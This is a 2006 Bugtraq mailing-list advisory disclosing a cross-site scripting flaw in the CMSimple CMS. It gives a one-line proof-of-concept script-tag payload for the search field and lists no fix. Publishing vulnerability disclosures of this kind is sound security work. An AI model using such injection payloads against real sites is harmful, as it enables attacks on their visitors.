Bugtraq mailing list archives

CMSimple Cross Site Scripting


From: Outlaw () aria-security net
Date: 3 Aug 2006 08:57:34 -0000

###############################################################
#Aria-Security.net Advisory                                   #
#Discovered  by: OUTLAW                                       #
#< www.Aria-security.net>                                     #
#Gr33t to: A.u.r.a  & l2odon & R@1D3N @ DrtRp & Cl0wn    #
###############################################################
#Software: CMSimple                              
#Attack method: Cross Site Scripting
#Original advisory:http://www.aria-security.net/advisory/cmsimple.txt
#
#
#Proof of Concept:
#
# Search in:  <script>alert(Aria-Security.Net)</script><!--
#
#----------------------------------------------------------                   
#
#Solution
#
#No Solutions
#
#----------------------------------------------------------                   


Current thread: